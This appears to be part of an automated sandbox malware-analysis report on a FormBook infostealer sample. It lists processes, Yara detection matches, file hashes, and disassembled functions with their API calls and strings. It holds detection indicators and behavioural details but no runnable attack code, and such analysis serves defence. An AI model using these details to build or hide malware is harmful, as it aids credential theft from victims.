00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	08:03:43
Start date:	31/08/2024
Path:	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe"
Imagebase:	0xa90000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	08:03:55
Start date:	31/08/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	5.4%
Signature Coverage:	13.8%
Total number of Nodes:	130
Total number of Limit Nodes:	10

Executed Functions

Function 00BB91E3 Relevance: 2.9, Strings: 2, Instructions: 437
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

P, xrefs: 00BB94D6
P, xrefs: 00BB9552

Memory Dump Source

Source File: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.2062008003.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062086323.0000000000BE7000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062106007.0000000000BEC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062122680.0000000000BEF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062137837.0000000000BF1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_play.jbxd

Yara matches

Similarity

API ID:
String ID: P$P
API String ID: 0-159270896
Opcode ID: 307e15e29adacde680cf7ae95d269657f41871bd0f162c5e16afe97fd93b5747
Instruction ID: ad92a6773520b5cc8cc84bc3d4fdfaf290e859ea1739d963d1a6d7d2902e265e
Opcode Fuzzy Hash: 307e15e29adacde680cf7ae95d269657f41871bd0f162c5e16afe97fd93b5747
Instruction Fuzzy Hash: 2EF14AB1D0021AABDB25DF94C885AFEB7B9EF45300F1481EAE505A7241DBB09A45CBA1

Function 00BB8373 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00BB83E5

Memory Dump Source

Source File: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.2062008003.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062086323.0000000000BE7000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062106007.0000000000BEC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062122680.0000000000BEF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062137837.0000000000BF1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_play.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 18c83c4bc469a3958f07e50db9539fa9f8a4413b8d7598cc28de7f0797679bf9
Instruction ID: 072522923c94f19fed1f8854f67584d40d2b050538e5c47f2269f224634d72f1
Opcode Fuzzy Hash: 18c83c4bc469a3958f07e50db9539fa9f8a4413b8d7598cc28de7f0797679bf9
Instruction Fuzzy Hash: 8F0100B5D1020DABDB10EAA4DC52FDEB7B89B54704F004195B908A7241F671EA14CB61

Function 00BCD283 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 00BCD2BA

Memory Dump Source

Source File: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.2062008003.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062086323.0000000000BE7000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062106007.0000000000BEC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062122680.0000000000BEF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062137837.0000000000BF1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_play.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 1f471ac0b6758558963a37103bd0abd05398afbae2e69a34deb77b5fa573b8a7
Instruction ID: ef175657822a2b600186a415b7bc31380986b302ff402789239f2659afc2a053
Opcode Fuzzy Hash: 1f471ac0b6758558963a37103bd0abd05398afbae2e69a34deb77b5fa573b8a7
Instruction Fuzzy Hash: 62E04F352042447BC630EA59DC45FDB779CEFC5710F404459FA0867241C770BA0086E0

Function 026D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 026D2B6A

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cd1195e168fa7d36098e113837179e28126fa8124077dd8cb4f2caa3a96a57c4
Instruction ID: efee196000c75d51608e89e2bf88174d1f66fe6ef59ef1e366489b3a0df5cb7d
Opcode Fuzzy Hash: cd1195e168fa7d36098e113837179e28126fa8124077dd8cb4f2caa3a96a57c4
Instruction Fuzzy Hash: 71900261203400034505755C4514617500A87E0201B55C021E1024A91EC52589916125

Function 026D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 026D2C7A

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 40e20bfaa94a2dc3e421fdb60c9b5a9070aa73de765e1acb15163bf31ef57013
Instruction ID: 1f6dd02cc0f77bead24281b29582f85478a6f7167657de16f3bd11eba863f9e0
Opcode Fuzzy Hash: 40e20bfaa94a2dc3e421fdb60c9b5a9070aa73de765e1acb15163bf31ef57013
Instruction Fuzzy Hash: 1E90023120248802D510755C850474B100587D0301F59C411A4434B59E869589917121

Function 026D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 026D2DFA

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 015a8a92450fa1f88fd2b58352669d47e23b1ea0b001b0a09be3a69704f9c21f
Instruction ID: ce67d9dc2bfcaea551e96fb94644f64dc606abc84edaf1833d6e2432373083f9
Opcode Fuzzy Hash: 015a8a92450fa1f88fd2b58352669d47e23b1ea0b001b0a09be3a69704f9c21f
Instruction Fuzzy Hash: 8990023120240413D511755C4604707100987D0241F95C412A0434A59E96568A52A121

Function 026D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 026D35CA

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 92bf30dfd1f8de6d56fe7aedf4526b45c46957bd0c726f1b1e3449da55e287d8
Instruction ID: 110c2595ff979e314a7856448858ed32cf82ff14235c4ebe6872d505f922d935
Opcode Fuzzy Hash: 92bf30dfd1f8de6d56fe7aedf4526b45c46957bd0c726f1b1e3449da55e287d8
Instruction Fuzzy Hash: D890023160650402D500755C4614707200587D0201F65C411A0434A69E87958A5165A2

Function 00BB49F3 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

--x702s3, xrefs: 00BB4C21, 00BB4C24
02s3, xrefs: 00BB4BFD
--x702s3, xrefs: 00BB4C0F, 00BB4C19, 00BB4C2A
--x7, xrefs: 00BB4BF6

Memory Dump Source

Source File: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.2062008003.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062086323.0000000000BE7000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062106007.0000000000BEC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062122680.0000000000BEF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062137837.0000000000BF1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_play.jbxd

Yara matches

Similarity

API ID:
String ID: --x7$--x702s3$--x702s3$02s3
API String ID: 0-3932342558
Opcode ID: 6a789a312008969e23ffa53accce04a0205c36c2b067d61e6143bef8525c190f
Instruction ID: 4eee4594a6fffbf55d6777e390d1ba709e8233895f474b8b9c28951f7d49f582
Opcode Fuzzy Hash: 6a789a312008969e23ffa53accce04a0205c36c2b067d61e6143bef8525c190f
Instruction Fuzzy Hash: 99519C73944648AFEB21CA74D881AFFBBA8FF52724B1841D8E5804B103D7A14902CBA5

Function 00BB4B97 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(37782D2D,00000111,00000000,00000000), ref: 00BB4C1A

Strings

--x702s3, xrefs: 00BB4C21, 00BB4C24
02s3, xrefs: 00BB4BFD
--x702s3, xrefs: 00BB4C0F, 00BB4C19, 00BB4C2A
--x7, xrefs: 00BB4BF6

Memory Dump Source

Source File: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.2062008003.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062086323.0000000000BE7000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062106007.0000000000BEC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062122680.0000000000BEF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062137837.0000000000BF1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_play.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: --x7$--x702s3$--x702s3$02s3
API String ID: 1836367815-3932342558
Opcode ID: 71d8c8f46f3d6d47e3c4c0ce270a3b10c4335664dd5254229d222e737f0ffd58
Instruction ID: 11b440c3d546daf22ea056bf88c7d8fa2866c7df8b25815eeb36170f4c433e4f
Opcode Fuzzy Hash: 71d8c8f46f3d6d47e3c4c0ce270a3b10c4335664dd5254229d222e737f0ffd58
Instruction Fuzzy Hash: 1811C6B2D0120C7EEB11A6E48C82DFF7BACDB41654F048099FA1067141D2684E0687A1

Function 00BB4BA3 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(37782D2D,00000111,00000000,00000000), ref: 00BB4C1A

Strings

--x702s3, xrefs: 00BB4C21, 00BB4C24
02s3, xrefs: 00BB4BFD
--x702s3, xrefs: 00BB4C0F, 00BB4C19, 00BB4C2A
--x7, xrefs: 00BB4BF6

Memory Dump Source

Source File: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.2062008003.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062086323.0000000000BE7000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062106007.0000000000BEC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062122680.0000000000BEF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062137837.0000000000BF1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_play.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: --x7$--x702s3$--x702s3$02s3
API String ID: 1836367815-3932342558
Opcode ID: 960b872d0d8fb56b7f0254849746158ae623060783a74815ce9866a6ff51ad9f
Instruction ID: 60a7299b1832c03aa247f0c976f18a65097c29ee4383af69b0f38425d895b91a
Opcode Fuzzy Hash: 960b872d0d8fb56b7f0254849746158ae623060783a74815ce9866a6ff51ad9f
Instruction Fuzzy Hash: 8D01C4B2D0120C7AEB10AAE59C82DFF7BBCDF41794F0480A9FA0467101D6785E068BB1

Function 00BB8419 Relevance: 1.5, APIs: 1, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00BB83E5

Memory Dump Source

Source File: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.2062008003.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062086323.0000000000BE7000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062106007.0000000000BEC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062122680.0000000000BEF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062137837.0000000000BF1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_play.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: c3c1c3bf01a3f059312ad99313bb003efde7cb6c0768ca1a14970783c4cdd5c9
Instruction ID: d7ac2ae174bc3bf1db8c33552ed4874594c070ab8d3a0401d3b58ae200f512ea
Opcode Fuzzy Hash: c3c1c3bf01a3f059312ad99313bb003efde7cb6c0768ca1a14970783c4cdd5c9
Instruction Fuzzy Hash: 8DF0A7B2E1010DEBDB10DA94CC52BADBBA4DB44604F14C5D5F918E7242E575DA15C741

Function 00BCD5C3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00BBF1B4,?,?,00000000,?,00BBF1B4,?,?,?), ref: 00BCD602

Memory Dump Source

Source File: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.2062008003.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062086323.0000000000BE7000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062106007.0000000000BEC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062122680.0000000000BEF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062137837.0000000000BF1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_play.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 42a2eb55ed9ab4eafebd09aecba0c620c764536a68ab8364ee360967e0e9ce59
Instruction ID: b1304c4130ece769230652195bd09037f1b8153a3c6798e089b9d7bba2203c42
Opcode Fuzzy Hash: 42a2eb55ed9ab4eafebd09aecba0c620c764536a68ab8364ee360967e0e9ce59
Instruction Fuzzy Hash: BCE06D71204708BBDA20EE58EC41FDB37ACEF85710F004449F918A7242D670B91086B4

Function 00BCD613 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,55976484,00000007,00000000,00000004,00000000,00BB7BFC,000000F4), ref: 00BCD652

Memory Dump Source

Source File: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.2062008003.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062086323.0000000000BE7000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062106007.0000000000BEC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062122680.0000000000BEF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062137837.0000000000BF1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_play.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7643dae74fd303d4b31b8a72003e225b83207ce6542e41c70fef9ff5d3a89d97
Instruction ID: fec852beef67dfb188a070eaa853e9a604e9cb0a500e121d43fa6af0ed3a8740
Opcode Fuzzy Hash: 7643dae74fd303d4b31b8a72003e225b83207ce6542e41c70fef9ff5d3a89d97
Instruction Fuzzy Hash: 14E092712043087BDB20EE99EC41FDB37ACEFC5710F004409F908A7241D670B91087B4

Function 00BCD663 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,AAD13498,?,?,AAD13498), ref: 00BCD697

Memory Dump Source

Source File: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.2062008003.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062086323.0000000000BE7000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062106007.0000000000BEC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062122680.0000000000BEF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062137837.0000000000BF1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_play.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: eb643b4384a43b211841a77eef74932c43db374d67d444e2a13eda5a6f112170
Instruction ID: 1807074e3bf1802c6302616756e14cb93939f273b8ff5f9b05de10389a8aad7d
Opcode Fuzzy Hash: eb643b4384a43b211841a77eef74932c43db374d67d444e2a13eda5a6f112170
Instruction Fuzzy Hash: ADE04632200204BBD620AB69EC41FDB77ACDBC5710F00855AFA08AB242C6B1BA1186E0

Function 026D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 026D2C24

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f92f59c3cb953fd88c60bf6a36118e16a8791f6dc00200319497e7f82bab0eac
Instruction ID: 4abe43fdc5ea6e911354704bcaa871bf7027604404d01d1ee5e646928421633a
Opcode Fuzzy Hash: f92f59c3cb953fd88c60bf6a36118e16a8791f6dc00200319497e7f82bab0eac
Instruction Fuzzy Hash: 52B09B71D025C5C5DE51E7644B08717790067D0701F15C461D2030752F4738C5D1E175

Non-executed Functions

Function 02712349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

MaxLoaderThreads, xrefs: 027124EC
UseImpersonatedDeviceMap, xrefs: 0271251C
GlobalFlag, xrefs: 02712F3F, 02713059
DisableHeapLookaside, xrefs: 0271246D
ShutdownFlags, xrefs: 027124A1
TracingFlags, xrefs: 02712549
Initializing the application verifier package failed with status 0x%08lx, xrefs: 02713176
ExecuteOptions, xrefs: 027125A0
GlobalFlag2, xrefs: 02712FC0
LdrpInitializeExecutionOptions, xrefs: 0271317D
CFGOptions, xrefs: 02712967
minkernel\ntdll\ldrinit.c, xrefs: 02713187
DisableExceptionChainValidation, xrefs: 0271275F
UnloadEventTraceDepth, xrefs: 027124C0
RaiseExceptionOnPossibleDeadlock, xrefs: 02712579
@, xrefs: 02712942
FrontEndHeapDebugOptions, xrefs: 02712489
MaxDeadActivationContexts, xrefs: 02712D82
MinimumStackCommitInBytes, xrefs: 02712BB0
@, xrefs: 02712B74

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 4bc5c71c1b172b6e3ba945507007faaa85ccb6bbfa6509255f1d11d887e0ddc1
Instruction ID: a091dff59a42223734e3c29786469bbd954ca020a5bee30f52cf4a63d8ab66bd
Opcode Fuzzy Hash: 4bc5c71c1b172b6e3ba945507007faaa85ccb6bbfa6509255f1d11d887e0ddc1
Instruction Fuzzy Hash: 71929C71A08351AFE720DF28C880B6BB7E9BF84714F04496DFA95E7291D770E844CB96

Function 026868B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON

Download Yara Rule

Strings

LdrpGetShimEngineInterface, xrefs: 026E9BB9
ApphelpCheckModule, xrefs: 02686A86
SE_ProcessDying, xrefs: 026869FF
apphelp.dll, xrefs: 0268698A
SE_InstallBeforeInit, xrefs: 0268691E
SE_LdrEntryRemoved, xrefs: 026869D2
SE_DllUnloaded, xrefs: 026869A5
SE_InitializeEngine, xrefs: 026868C5
minkernel\ntdll\ldrinit.c, xrefs: 026E9BC3
SE_DllLoaded, xrefs: 02686978
SE_InstallAfterInit, xrefs: 0268694B
Could not locate procedure "%s" in the shim engine DLL, xrefs: 026E9BB3
SE_GetProcAddressForCaller, xrefs: 02686A59
SE_LdrResolveDllName, xrefs: 02686A2C
SE_ShimDllLoaded, xrefs: 026868F1

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-3089669407
Opcode ID: de4836eda234afe68629ae102f4fefe46cfc6236e5fd2a1b7f74c5e73801d576
Instruction ID: 979d1c92e10faae74738ec5c4b50e4731831b5e780f8c5015b797050892398f9
Opcode Fuzzy Hash: de4836eda234afe68629ae102f4fefe46cfc6236e5fd2a1b7f74c5e73801d576
Instruction Fuzzy Hash: AE811FB2D42218AFDB11FAE4DDC4EEF77BEAB04714B558926FA01E7110E630DD148BA0

Function 026C8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0270540A, 02705496, 02705519
corrupted critical section, xrefs: 027054C2
8, xrefs: 027052E3
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 027054E2
Invalid debug info address of this critical section, xrefs: 027054B6
undeleted critical section in freed memory, xrefs: 0270542B
Critical section address, xrefs: 02705425, 027054BC, 02705534
Thread is in a state in which it cannot own a critical section, xrefs: 02705543
Critical section address., xrefs: 02705502
Critical section debug info address, xrefs: 0270541F, 0270552E
Thread identifier, xrefs: 0270553A
double initialized or corrupted critical section, xrefs: 02705508
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 027054CE
Address of the debug info found in the active list., xrefs: 027054AE, 027054FA

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: b104fcefeefbfd470d5c2d2ad0a27d97dbebcc3e8618fba1101c8abef1622e57
Instruction ID: 81d0877517799ea5a88347571f03aeed5ca01311d6b6a713d7b9ecb1660c39d9
Opcode Fuzzy Hash: b104fcefeefbfd470d5c2d2ad0a27d97dbebcc3e8618fba1101c8abef1622e57
Instruction Fuzzy Hash: 86816AB1A40358EEEB20DF99C889BAEBBF5FB09714F604119E505B7680D3B5A944CF60

Function 026C29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 02702409
@, xrefs: 0270259B
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 02702498
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 02702602
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 02702412
RtlpResolveAssemblyStorageMapEntry, xrefs: 0270261F
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 027024C0
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 02702506
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 027022E4
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 027025EB
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 02702624

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

